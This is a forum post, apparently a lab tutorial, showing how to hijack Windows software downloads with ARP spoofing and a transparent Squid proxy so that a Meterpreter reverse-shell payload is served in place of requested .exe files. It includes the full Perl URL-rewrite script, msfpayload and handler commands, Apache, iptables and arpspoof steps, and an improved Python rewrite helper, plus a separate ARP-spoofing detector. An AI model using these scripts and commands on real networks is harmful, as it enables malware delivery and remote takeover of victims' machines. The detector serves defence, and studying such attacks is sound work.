Thread: [Video] Owning Windows (XP SP3 vs. Squid)

  1. #1
    Moderator g0tmi1k

    [Video] Owning Windows (XP SP3 vs. Squid)

    Links
    Watch video on-line: http://g0tmi1k.blip.tv/file/4862927/
    Download video: http://www.mediafire.com/?l7gezd8ai263a72
    Download Script (replace.pl): http://www.mediafire.com/?nheqdn6h4i6w17k


    Brief Overview
    This screencast demonstrates hijacking applications while they are being downloaded from the Internet and replacing the program with a meterpreter agent instead. The files can be downloaded either by the target or by another program (for example, self-updating programs).

    The attacker takes control of the traffic by doing a "Man In The Middle" (MITM) attack to analyse the traffic, in which, if the requested file ends in ".exe", it is redirected to the attacker's web server, which always replies with the agent under the requested filename, creating the illusion that it was the requested file.

    Please note: Unlike the other two videos previously, where the attacker was targeting programs/services that come with the Operating System, the attacker pursues 3rd party applications - or the process of trying to install them. The result of this is that more user interaction is needed than before, whereas before it was either very little (visit any web page) or nothing. Therefore the attacker needs the target to perform a certain action (either willingly or unaware).
    The chosen method of attack can be performed by a simpler method; however, this method was chosen for reasons of future posts.


    Scenario/Setup
    This is the third video in a series of attacking Operating Systems, and our target has now updated to Windows XP Service Pack 3 in the hope of better security, after becoming compromised... twice.

    After spending hours re-formatting, installing and restarting, the target is using a fully up-to-date Windows XP SP3 system with the latest security patches as of March 2011. They haven't used their system "much", as every setting is still at its default and they haven't installed any programs such as Anti-Virus, Firewalls or any browser-based applications (e.g. Flash or Java).

    This time around, the attacker targets the process of installing new or updating existing software.


    What was needed?

    • Nmap – (Can be found in BackTrack 4-R2)
    • PostgreSQL – (Can be found in BackTrack 4-R2)
    • Metasploit – (Can be found in BackTrack 4-R2)
    • Apache – (Can be found in BackTrack 4-R2)
    • A Text Editor – (Kate can be found in BackTrack 4-R2)
    • Squid – (Can be found in the BackTrack repository)
    • arpspoof – (Part of the DSniff suite, which can be found in BackTrack 4-R2)



    replace.pl
    Code:
    #!/usr/bin/perl
    ########################################################################
    # replace.pl         --- Squid Script (Application replacement)        #
    # g0tmi1k 2011-03-09                                                   #
    ########################################################################
    use strict;
    use warnings;
    use IO::Handle;
    use File::Basename;
    
    $|=1;                                 # Squid reads one reply per line; never buffer stdout
    my $ourIP = "192.168.0.33";           # attacker's web server (Apache answers every name with evil.exe)
    my $debug = 0;
    
    my $DEBUG;
    if ($debug == 1) {
       open ($DEBUG, '>>', '/tmp/replace_debug.log') or die "Cannot open debug log: $!";
       $DEBUG->autoflush(1);              # only touch the handle when it was actually opened
    }
    
    # Squid url_rewrite_program protocol: one request per line ("URL ip/fqdn ident method ..."),
    # one reply per line: the new URL, or the input echoed back to leave the request unchanged.
    while (<>) {
       chomp $_;
       if ($_ =~ /(.*\.exe)/i) {
          my $url = $1;                   # capture first, then log (the original logged $url before setting it)
          my $filename = basename( $url );
          my $new_url = "http://$ourIP/$filename";
          print "$new_url\n";
          if ($debug == 1) { print $DEBUG "Input: $_\nFilename: $filename\nOutput: $new_url\n"; }
       }
       else {
          print "$_\n";
       }
    }

    Method

    • Start network services and obtain an IP address
    • Create resource file and agent for metasploit
    • Start and configure metasploit to listen for the backdoor
    • Configure and start apache web server
    • Download, install and configure Squid proxy
    • Perform a man in the middle attack
    • Wait for target to download a program (either willing or unknown)
    • Game Over



    Commands:
    Code:
    start-network
    dhclient eth0
    /etc/init.d/postgresql-8.3 start
    clear
    
    nmap 192.168.0.* -n -sn
    nmap 192.168.0.103 -T4 -O -v
    clear
    
    echo "client.railgun.user32.MessageBoxA(0,\"Corrupt file. Please re-download\",\"Setup\",\"MB_OK\")" > /root/replace.rb
    msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.33 LPORT=4444 X > /var/www/evil.exe
    export GOCOW=1     # Always cow logo ;)
    msfconsole
    use multi/handler
    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST 0.0.0.0
    set ExitOnSession false
    set AutoRunScript /root/replace.rb
    show options
    exploit -j
    
    #kate -> New
    Options +FollowSymlinks
    RewriteEngine on
    RewriteRule ^(.*) evil.exe
    # Save: /var/www/.htaccess
    #kate -> Open: /etc/apache2/sites-enabled/000-default
    #Edit (Line 11): AllowOverride All
    #Save
    start-apache   # /etc/init.d/apache2 start
    
    apt-cache search squid
    apt-get install squid3
    y
    update-rc.d -f squid3 remove
    
    kate -> Open: /etc/squid3/squid.conf
    Edit (Line 588): acl localnet src 192.168.0.0/16
    Edit (Line 644): http_access allow localnet
    Edit (Line 868): http_port 3128 transparent
    Add (Line: *end*): url_rewrite_program /root/replace.pl
    Save
    kate -> Open: /root/replace.pl
    chmod 755 /root/replace.pl
    /etc/init.d/squid3 restart
    
    iptables --table nat --append PREROUTING --in-interface eth0 --proto tcp --destination-port 80 --jump REDIRECT --to-port 3128
    echo 1 > /proc/sys/net/ipv4/ip_forward
    #cat /proc/sys/net/ipv4/ip_forward
    #Start -> run -> cmd -> arp -a
    arpspoof -i eth0 -t 192.168.0.103 192.168.0.1
    #Start -> run -> cmd -> arp -a
    
    IE -> http://www.filehippo.com -> Search: flash. Download & Run
    
    sessions -l -v
    #Kill arpspoof
    
    IE -> http://www.filehippo.com -> Search: notepad++. Download Older & Run
    
    arpspoof -i eth0 -t 192.168.0.103 192.168.0.1
    
    Notepad++ -> ? -> Check for updates
    
    #Kill arpspoof
    sessions -l -v
    sessions -i 2
    sysinfo
    getuid
    getsystem
    getuid
    Last edited by g0tmi1k; 03-10-2011 at 08:14 PM.
    Have you...g0tmi1k?
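The rewrite step described in the post (every ".exe" download steered to the attacker's web server under the same file name), written here as an added example in Python. This is not the replace.pl from the post; it keeps the same behaviour but decides on the URL path rather than on a ".exe" substring, so a host such as www.exe.com or a file such as update.exec is left alone while http://host/dl/setup.exe?id=1 is rewritten, and percent-encoded names are decoded first. The helper protocol it assumes is the Squid 3.0/3.1 one the post configures with url_rewrite_program: input lines of the form "URL client_ip/fqdn ident method", one URL back per line, where returning the original URL means "no change". The sample lines and addresses are constructed for the self-check and are not captured traffic.

```python
"""Squid url_rewrite_program helper for the .exe replacement step.

Added example, not the replace.pl from the post. Same idea (send any *.exe
download to the attacker's web server under the same file name, where Apache
answers with evil.exe), but the decision is made on the URL path only.
Assumed helper protocol: Squid 3.0/3.1 style, "URL client_ip/fqdn ident method"
in, one URL per line out; the original URL means "leave unchanged".
"""
import posixpath
import sys
from urllib.parse import unquote, urlsplit

OUR_IP = "192.168.0.33"      # attacker web server, the same address used in the post


def target_filename(url):
    """Return the file name if the URL path ends in .exe, otherwise None.

    The query string and fragment are ignored and the host name is never
    examined, so "http://www.exe.com/" and "update.exec" do not match.
    """
    parts = urlsplit(url)
    if parts.scheme.lower() not in ("http", "https"):
        return None
    name = posixpath.basename(unquote(parts.path))
    if len(name) > 4 and name.lower().endswith(".exe"):
        return name
    return None


def rewrite_line(line, our_ip=OUR_IP):
    """Turn one helper input line into the URL Squid should fetch."""
    fields = line.split()
    if not fields:
        return ""                       # empty or garbage input: reply with an empty line
    url = fields[0]
    name = target_filename(url)
    if name is None:
        return url                      # unchanged: Squid fetches the real URL
    return "http://%s/%s" % (our_ip, name)


# Constructed helper input lines (not captured traffic) for a quick self-check.
SAMPLE_LINES = [
    "http://dl.example.net/dl/setup.exe?id=1 192.168.0.103/- - GET -",
    "http://www.exe.com/ 192.168.0.103/- - GET -",
    "http://host.example/update.exec 192.168.0.103/- - GET -",
    "http://host.example/Npp%2Eexe 192.168.0.103/- - GET -",
]


def run_samples(lines=SAMPLE_LINES):
    """Return {input_url: reply} for the constructed sample lines."""
    return {l.split()[0]: rewrite_line(l) for l in lines}


if __name__ == "__main__":
    # Squid talks to the helper over stdin/stdout, one request per line;
    # every reply must be flushed or Squid waits for ever on a buffered pipe.
    for raw in sys.stdin:
        sys.stdout.write(rewrite_line(raw) + "\n")
        sys.stdout.flush()
```

Dropped in place of /root/replace.pl (with the same chmod 755 and url_rewrite_program line) it behaves the same for a plain installer download; the difference only shows on URLs where ".exe" appears somewhere other than at the end of the path.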

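The post checks the target's ARP cache by eye ("arp -a" before and after arpspoof is started). The following added example, not from the post, does that comparison in code from the victim's side: it parses two Windows "arp -a" dumps, reports every IP whose MAC changed, and flags the other tell-tale of the arpspoof step, the gateway address suddenly sharing a MAC with another host on the segment (the attacker's). The BEFORE and AFTER texts are constructed to look like Windows XP "arp -a" output; the addresses and MACs are made up.

```python
"""Victim-side check for the arpspoof step: diff two Windows `arp -a` dumps.

Added example, not from the post. Parses `arp -a` output, lists MAC changes
between two dumps and flags a gateway whose new MAC is also bound to another
IP. Sample dumps below are constructed, not real captures.
"""
import re

# One ARP table row: "  192.168.0.1    00-11-22-33-44-55    dynamic"
ARP_ROW = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+([0-9a-f]{2}(?:-[0-9a-f]{2}){5})\s+(\w+)",
    re.I)


def parse_arp_a(text):
    """Map IP -> MAC (lower case) from `arp -a` output; header lines are skipped."""
    table = {}
    for line in text.splitlines():
        m = ARP_ROW.match(line)
        if m:
            table[m.group(1)] = m.group(2).lower()
    return table


def mac_changes(before, after):
    """{ip: (old_mac, new_mac)} for every IP whose MAC differs between dumps."""
    return {ip: (before[ip], after[ip])
            for ip in before if ip in after and before[ip] != after[ip]}


def shared_macs(table):
    """{mac: [ips]} for MACs bound to more than one IP in a single dump."""
    by_mac = {}
    for ip, mac in table.items():
        by_mac.setdefault(mac, []).append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


def gateway_spoofed(before_text, after_text, gateway="192.168.0.1"):
    """True when the gateway's MAC changed and the new MAC belongs to another IP too."""
    before, after = parse_arp_a(before_text), parse_arp_a(after_text)
    changed = mac_changes(before, after)
    if gateway not in changed:
        return False
    new_mac = changed[gateway][1]
    return gateway in shared_macs(after).get(new_mac, [])


# Constructed dumps (not real captures) in the Windows XP `arp -a` layout.
# 192.168.0.1 is the gateway, 192.168.0.33 the attacker, as in the post.
BEFORE = """Interface: 192.168.0.103 --- 0x2
  Internet Address      Physical Address      Type
  192.168.0.1           00-11-22-33-44-55     dynamic
  192.168.0.33          00-aa-bb-cc-dd-ee     dynamic
"""
AFTER = """Interface: 192.168.0.103 --- 0x2
  Internet Address      Physical Address      Type
  192.168.0.1           00-AA-BB-CC-DD-EE     dynamic
  192.168.0.33          00-aa-bb-cc-dd-ee     dynamic
"""

if __name__ == "__main__":
    print("gateway spoofed:", gateway_spoofed(BEFORE, AFTER))
    print("changes:", mac_changes(parse_arp_a(BEFORE), parse_arp_a(AFTER)))
```

A MAC change alone can be legitimate (a replaced router), so the function only raises the flag when the new gateway MAC is also answering for a second IP, which is exactly what arpspoof with a single interface produces.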